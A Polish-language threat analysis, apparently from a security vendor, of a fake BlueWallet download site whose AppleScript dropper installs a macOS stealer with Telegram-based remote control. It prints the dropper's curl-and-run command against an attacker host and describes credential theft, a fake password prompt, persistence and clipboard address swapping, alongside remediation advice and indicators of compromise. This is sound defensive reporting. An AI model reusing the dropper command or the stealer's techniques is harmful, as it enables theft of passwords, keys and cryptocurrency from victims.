Privacy, oszustwa, informacje o zagrożeniach

Fałszywa aplikacja BlueWallet kradnie hasła, dane kont i kryptowaluty z komputerów Mac

autor: Stefan Dasic | 1 czerwca 2026 r.
Fałszywa aplikacja BlueWallet kradnie hasła, dane kont i kryptowaluty z komputerów Mac

Fałszywa strona internetowa podszywająca się pod BlueWallet (prawdziwy portfel bitcoinowy) atakuje Mac za pomocą prostego, ale skutecznego sposobu. Sam serwis BlueWallet nie został zhakowany. Cyberprzestępcy wykorzystali jedynie nazwę i wizerunek tego legalnego portfela bitcoinowego, aby złośliwy plik do pobrania wyglądał na godny zaufania.

Jeśli szukałeś portfela kryptowalutowego i trafiłeś na jedną z tych fałszywych stron pobierania BlueWallet, witryna ta próbowała nakłonić Cię do otwarcia pobranego pliku w wbudowanym narzędziu systemu macOS i kliknięcia przycisku „Uruchom”. Jeśli postąpiłeś zgodnie z tymi instrukcjami, złośliwe oprogramowanie mogło wykraść zapisane hasła, dane logowania do przeglądarek, portfele kryptowalutowe, dokumenty i inne poufne dane. Monitoruje ono również schowek w poszukiwaniu adresów portfeli kryptowalutowych i może zastąpić je adresami kontrolowanymi przez atakującego.

Ta ostatnia funkcja jest szczególnie niebezpieczna. Jeśli przed wysłaniem środków skopiujesz adres portfela, złośliwe oprogramowanie może po cichu zastąpić go adresem atakującego. Na ekranie wszystko wygląda normalnie, ale pieniądze trafiają gdzie indziej.

Czy należy się martwić? Tylko wtedy, gdy pobrałeś ten plik i go uruchomiłeś. Samo wejście na stronę i jej zamknięcie nie powoduje żadnych skutków. Atak zależy wyłącznie od tego, czy użytkownik otworzy skrypt i kliknie przycisk odtwarzania.

Jeśli jednak uruchomiłeś ten program, potraktuj komputer jako zainfekowany i postępuj zgodnie z poniższymi instrukcjami.

Co zrobić, jeśli mogłeś to uruchomić

Jeśli otworzyłeś plik i kliknąłeś przycisk odtwarzania, załóż, że Twoje urządzenie zostało zainfekowane, i wykonaj poniższe czynności:

  • Odłącz urządzenie od sieci, aby odciąć kanał sterujący
  • Przeprowadź pełne skanowanie urządzenia i upewnij się, że korzystasz z aktualnego oprogramowania zabezpieczającego z włączoną ochroną internetową
  • Z innego, zaufanego urządzenia zmień hasła do wszystkich kont używanych na komputerze Mac, zaczynając od kont e-mailowych i giełd kryptowalut
  • Przenieś dowolną kryptowalutę do nowego portfela utworzonego na niezaładowanym wcześniej urządzeniu
  • Traktuj istniejące frazy seedowe i klucze jako ujawnione
  • Przed wysłaniem kryptowaluty w przyszłości sprawdź dokładnie cały adres odbiorcy, znak po znaku
  • Sprawdź, czy w folderze znajdują się nieznane pliki, i usuń je ~/Library/LaunchAgents
  • Poszukaj ukrytego .sysupd.sh zapisać w /tmp
  • Należy zmieniać dane dostępowe do usługi Cloud i SSH, jeśli .ssh, .awslub .gnupg na komputerze znajdowały się pliki
  • W razie wątpliwości lepiej wykonaj kopię zapasową danych i zainstaluj system macOS ponownie z pewnego źródła, zamiast próbować przeprowadzać czystą instalację na istniejącym dysku

Zabrałeś coś, czego nie powinieneś?

Sztuczki socjotechniczne

Najciekawszym aspektem tej kampanii nie są kwestie techniczne. Atakujący nie włamali się do komputerów Mac nie ominęli zabezpieczeń firmy Apple. Przekonali ofiary, by same uruchomiły złośliwe oprogramowanie.

Fałszywa strona internetowa prowadzi użytkowników przez cały proces, oferując przekonującą stronę pobierania, proste instrukcje, a nawet skrót klawiaturowy. Atak kończy się sukcesem, ponieważ ofiara wierzy w to, co widzi.

W miarę jak systemy operacyjne coraz skuteczniej blokują złośliwe oprogramowanie, cyberprzestępcy coraz częściej stawiają na socjotechnikę. Zamiast szukać sposobów na obejście zabezpieczeń, przekonują ludzi, by je ignorowali.

Dlatego coraz większego znaczenia nabiera jeden nawyk: należy podchodzić z rezerwą do wszelkich plików do pobrania, które zawierają instrukcje, by otworzyć je w edytorze skryptów, narzędziu programistycznym lub oknie terminala i kliknąć „Uruchom”.

W tej kampanii wystarczyło jedno naciśnięcie klawiszy ⌘R, aby zamienić komputer Mac narzędzie do kradzieży haseł, portfeli kryptowalutowych i danych ze schowka oraz w narzędzie do zdalnego dostępu.

Analiza techniczna

Etap pierwszy: Program do pobierania plików AppleScript

Strona znajduje się pod adresem update-bluewallet[.]com, nazwa domeny wystarczająco zbliżona do prawdziwego portfela (bluewallet.io) na pierwszy rzut oka. Strona nie czeka na wyrażenie zgody. Jej skrypt uruchamia procedurę pobierania po upływie dwóch sekund od załadowania strony, a także ponownie, jeśli użytkownik kliknie którykolwiek z dwóch przycisków.

Plik, który trafia do folderu „Pobrane”, nosi nazwę BlueWallet Installer.applescript, rozszerzenie, którego większość ludzi nigdy nie widziała i do którego nie ma powodu, by podchodzić z nieufnością.

W tym momencie strona wykazuje się sprytnym zabiegiem. Po krótkiej chwili zmienia treść komunikatu, tak by brzmiał on jak instrukcja instalacji: „Uruchom instalator, a następnie naciśnij przycisk odtwarzania lub ⌘R”. W tekście pojawia się nawet mały niebieski trójkąt odtwarzania, dzięki czemu sformułowanie odpowiada rzeczywistemu interfejsowi Edytora skryptów, który ofiara wkrótce zobaczy.

Fałszywa strona internetowa BlueWallet, która prowadzi ofiarę przez proces pobierania i uruchamiania złośliwego skryptu

Strona ta krok po kroku wyjaśnia ofierze, jakie czynności należy wykonać, aby uruchomić ten plik.

W nowszych wersjach systemu macOS aplikacja bez podpisu pobrana z internetu jest najpierw umieszczana w kwarantannie i sprawdzana, zanim będzie można ją uruchomić. Zwykły skrypt otwarty w Edytorze skryptów i uruchomiony przez użytkownika omija ten proces. Użytkownik ręcznie nakazuje zaufanemu narzędziu Apple uruchomienie kodu, więc nie ma tu żadnej bariery w postaci weryfikacji podpisu, która mogłaby spowodować niepowodzenie.

Właśnie dlatego atakujący wybrał skrypt AppleScript zamiast gotowej aplikacji: w ten sposób ryzykowna czynność nie leży już w gestii systemu operacyjnego, lecz w gestii ofiary.

Sam skrypt AppleScript jest niezwykle krótki. Po usunięciu zbędnych komentarzy, w tym fałszywego numeru wersji i wiersza sugerującego, że jest to „aktualizacja Brew Install”, wykonuje on jedno polecenie powłoki zakodowane w base64, a następnie nakazuje edytorowi skryptów zamknięcie bez zapisywania, usuwając w ten sposób wszelkie ślady z ekranu.

Instalacja, aktualizacja i uaktualnienie

W skrócie, to polecenie wykonuje następujące czynności:

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

Pobiera drugi skrypt ze zdalnego serwera, zapisuje go w ukrytym pliku w katalogu tymczasowym, nadaje mu uprawnienia do wykonywania, a następnie uruchamia go w tle z wyłączonym wyświetlaniem wyników.

Ofiara nic nie widzi. Nazwa pliku .sysupd.sh jest zamaskowany jako aktualizacja systemu. To klasyczny przykład droppera wieloetapowego: pierwszy etap jest niewielki i jednorazowy, a jego jedynym zadaniem jest pobranie prawdziwego ładunku.

Etap drugi: Analiza ładunku

Pierwsze linijki określają sposób działania złośliwego oprogramowania. Określają one umask 077 tak więc wszystko, co tworzy, jest czytelne wyłącznie dla zaatakowanego użytkownika, a następnie tworzy ukryty katalog roboczy o losowej nazwie w /tmp pochodzący z /dev/urandom.

Jej kod jest zaszyfrowany, ale niezbyt skutecznie. Mała funkcja o nazwie _xd przechodzi po ciągu znaków hex po dwa znaki na raz i wykonuje operację XOR na każdym bajcie względem stałego, powtarzającego się klucza: swckR9JCD2Uu.

Ta funkcja dekoduje w czasie wykonywania token bota Telegramu, identyfikator czatu, token polecenia dodatkowego oraz adres URL serwera przejściowego. To wystarcza, by pokonać narzędzia, które wyszukują jedynie ciągi tekstowe w postaci zwykłego tekstu, ale niewiele więcej. Ponieważ zarówno klucz, jak i algorytm znajdują się w pliku, każdą zakodowaną wartość można w pełni odtworzyć.

Jedna rzecz rzuca się w oczy: wartość odszyfrowanego czatu w Telegramie i wartość odszyfrowanego czatu służącego do sterowania i kontroli są identyczne. Atakujący wykorzystuje jeden kanał w Telegramie zarówno jako miejsce przechowywania wykradzionych danych, jak i kanał sterujący. Jest to rozwiązanie niedrogie, skalowalne, szyfrowane i wtapiające się w zwykły ruch HTTPS.

Nie wszystko jest zaszyfrowane. Adresy służące do przejmowania zawartości schowka znajdują się w pliku w postaci zwykłego tekstu: adres Bitcoin, adres Ethereum i adres Solana. Są to adresy, na które implant podmienia dane, gdy wykryje, że kopiujesz adres portfela. Ponieważ są one publiczne w swoich łańcuchach bloków, należą również do najbardziej przydatnych elementów w całej próbce.

Co kradnie złośliwe oprogramowanie

Procedury gromadzenia danych w drugim etapie mają charakter kompleksowy. Obejmują one sześć szerokich kategorii.

1. Przeglądarki internetowe

Skrypt pobiera historię przeglądania, pliki cookie, dane logowania oraz zakładki z wielu różnych przeglądarek, w tym:

  • Przeglądarki oparte na silniku Chromium: Google Chrome , beta, Canary i Dev); Brave; Microsoft Edge; Vivaldi; Opera; Opera GX; Arc; Chromium; Coccoc; oraz Yandex
  • Przeglądarki oparte na silniku Firefox: Firefox, Waterfox, Pale Moon, Zen i LibreWolf
  • Dane przeglądarki natywnej systemu macOS: pliki cookie Safari, historia przeglądania i wartości formularzy

2. Portfele kryptowalutowe

Wydaje się, że właśnie na tym skupia się ten scenariusz.

Obejmuje to aplikacje portfeli komputerowych, w tym Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop oraz Tonkeeper.

Obejmuje to również portfele w postaci rozszerzeń przeglądarek w różnych ekosystemach:

  • Bitcoin: Xverse , Leather, UniSat, Alby i Wizz
  • Solana: Phantom , Solflare, Backpack, Nightly, MagicEden, Sollet i Slope
  • Portfele EVM: MetaMask , Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin i XDEFI
  • Kosmos: Kepler , Stacja i Kosmostacja
  • Inne ekosystemy: Yoroi , Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos i Temple

3. Menedżery haseł i narzędzia zabezpieczające

Złośliwe oprogramowanie atakuje lokalne pamięci i ustawienia kilku menedżerów haseł, w tym LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt i Buttercup.

Sprawdza również dane związane z uwierzytelnianiem dwuskładnikowym (2FA) oraz aplikacjami uwierzytelniającymi, takimi jak Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS i FreeOTP.

4. Aplikacje komunikacyjne i społecznościowe

Skrypt próbuje skopiować dane sesji oraz zawartość lokalnej pamięci aplikacji Telegram Desktop i Discord, w tym Discord Canary i Discord PTB.

5. Narzędzia dla programistów i narzędzia chmurowe

Szuka danych uwierzytelniających i plików konfiguracyjnych w katalogu domowym użytkownika, w tym:

  • Konfiguracje AWS CLI w .aws
  • Klucze SSH w .ssh
  • Klucze GnuPG w .gnupg
  • Konfiguracje Kubernetes w .kube
  • Pliki Shell i Git, w tym .zshrc, .zsh_history, .bash_historyi .gitconfig

6. Aplikacje zwiększające wydajność i pliki ogólne

Skrypt kopiuje lokalną bazę danych aplikacji Apple Notes, NoteStore.sqlite.

Wyszukuje również dane dotyczące rozszerzeń przeglądarki związanych z narzędziami zakupowymi i zwiększającymi wydajność, w tym Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist i Google Keep.

Na koniec przeszukuje foldery „Pulpit”, „Dokumenty” i „Pobrane” w poszukiwaniu plików o rozszerzeniach, w tym .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pemi .env, z uwzględnieniem limitu wielkości.

Co robi ze skradzionymi danymi

Złośliwe oprogramowanie próbuje bezpośrednio przechwycić hasło do konta użytkownika. osascript W oknie dialogowym zatytułowanym „Preferencje systemowe” użytkownik jest proszony o ponowne wprowadzenie hasła, „aby kontynuować”. Skrypt sprawdza poprawność każdego wprowadzonego hasła względem dscl . authonly przed zapisaniem, więc zatrzymuje się dopiero po uzyskaniu poprawnych danych uwierzytelniających.

W celu eksfiltracji archiwizuje przygotowane dane przy użyciu wbudowanego narzędzia systemu macOS ditto, prawdopodobnie dlatego, że jest zawsze obecny, w przeciwieństwie do zip. Aby nie przekroczyć limitu przesyłania plików w Telegramie wynoszącego 50 MB, aplikacja dzieli większe archiwa na części o wielkości 49 MB za pomocą split przed wysłaniem każdej części.

Zapewnia to trwałość poprzez zapisanie pliku plist agenta uruchamiającego w katalogu użytkownika ~/Library/LaunchAgents, oparte na ukrytym katalogu pomocniczym, oraz ładując je za pomocą launchctl aby implant uruchamiał się ponownie przy każdym logowaniu.

„Clipboard Hijack” to pętla odtwarzana w tle na żywo. A clip_watch Funkcja ta na bieżąco monitoruje schowek, rozpoznaje formaty adresów Bitcoin, Ethereum i Solana za pomocą wyrażeń regularnych, przekazuje oryginalny adres do kanału dowodzenia oraz zastępuje zawartość schowka adresem atakującego za pomocą pbcopy.

Oznacza to, że zamiana następuje w tle podczas kopiowania i wklejania.

Wreszcie, złośliwym oprogramowaniem można sterować w trybie interaktywnym. A c2_loop sprawdza, czy bot Telegramu otrzymał polecenia, i obsługuje pełen zestaw narzędzi operatorskich:

  • /info szczegóły dotyczące systemu
  • /exec dla dowolnych poleceń powłoki
  • /clipboard aby odczytać aktualną zawartość schowka
  • /download aby pobrać określone pliki
  • /exfil aby ponownie uruchomić moduł kradzieży
  • /selfdestruct aby zatrzeć ślady

Dzięki temu kanał na Telegramie staje się narzędziem do zdalnego sterowania w czasie rzeczywistym, a nie tylko kanałem do jednostronnego przekazywania informacji.

Życie z tego, co daje ziemia, i z Telegrama

Schemat jest tu dobrze znany i staje się coraz powszechniejszy: warto polegać na sprawdzonych narzędziach.

Metoda ta wykorzystuje w nieuprawniony sposób własny edytor skryptów firmy Apple. Konfiguracja jest ukryta za prostym szyfrem XOR, a nie w skompresowanych plikach binarnych. Kanał poleceń opiera się na interfejsie API botów serwisu Telegram, który pozwala ominąć filtry wychodzące, które w innym przypadku zablokowałyby połączenie z nieznanym serwerem.

Żaden z tych elementów nie jest sam w sobie nowością. Skuteczność polega na łączeniu elementów, które wyglądają na wiarygodne, tak aby żaden pojedynczy krok nie wzbudził podejrzeń.

Możliwości wykrywania

W tym przypadku nie chodzi tu tyle o przynętę, co o samą technikę.

Edytor skryptów wykonujący jednowierszowy kod Base64 do shell script program, który natychmiast się zamyka, stanowi wyraźny sygnał behawioralny i jest znacznie lepszym celem wykrywania niż jednorazowy plik pierwszego etapu. Podobnie jak ukryty /tmp/.sysupd.sh pobrane przez curl i uruchamia się w tle.

Przeglądarki i platformy do pobierania plików mogłyby traktować .applescript pliki pobierane z internetu traktuje z taką samą podejrzliwością jak pliki wykonywalne. Telegram pozostaje natomiast niedostatecznie monitorowanym kanałem komunikacji typu „command-and-control”, którego działanie można by skutecznie zakłócić u źródła poprzez zgłaszanie nadużyć związanych z tokenami botów.

Wskaźniki naruszenia bezpieczeństwa

Suma kontrolna pliku (SHA-256)

  • 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)

Wskaźniki sieciowe

  • update-bluewallet[.]com
  • projects2026box[.]com

Adresy przejęcia schowka

  • BTC: bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
  • ETH: 0x2B871703122064e45d77146a6D5203da3bD192FA
  • SOL: 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v

Nie tylko informujemy o zagrożeniach - my je usuwamy

Zagrożenia cyberbezpieczeństwa nigdy nie powinny wykraczać poza nagłówek. Chroń swoje urządzenia przed zagrożeniami, pobierając Malwarebytes już dziś.

O autorze

Stefan Dasic

Stefan Dasic

Pasjonat rozwiązań antywirusowych, Stefan od najmłodszych lat zajmuje się testowaniem złośliwego oprogramowania i kontrolą jakości produktów AV. Jako członek zespołu Malwarebytes , Stefan jest oddany ochronie klientów i zapewnianiu im bezpieczeństwa.

NAJNOWSZE ARTYKUŁY

Aktualności
tydzień w bezpieczeństwie

Tydzień w świecie bezpieczeństwa (od 25 do 31 maja)

Czerwiec 1, 2026

Lista tematów, które omówiliśmy w tygodniu od 25 do 31 maja 2026 r.

Podcast
Zilustrowana kłódka jest zamontowana w statywie mikrofonowym, z którego emitowane są fale dźwiękowe.

Aplikacje płatnicze śledzą to, co mówisz (Lock and Code, sezon 7, odcinek 11)

May 31, 2026

W tym tygodniu w podcaście „Lock and Code” rozmawiamy z Rainey Reitman o cenzurze finansowej, która powoduje blokowanie kont klientów w popularnych aplikacjach płatniczych.

Aktualności
Logo Signal

Użytkownicy serwisu Signal stali się celem ataków phishingowych mających na celu kradzież kopii zapasowych

May 29, 2026

Cyberprzestępcy podszywają się pod dział pomocy technicznej Signal, aby wykraść klucze do przywracania kopii zapasowych, co daje im dostęp do całego archiwum wiadomości ofiar.

Powiązane artykuły

Ikona współtwórców

Współtwórcy

Ikona Centrum zagrożeń

Centrum ds. zagrożeń

Ikona podcastów

Podcast

Ikona słowniczka

Słowniczek

Ikona oszustwa

Oszustwa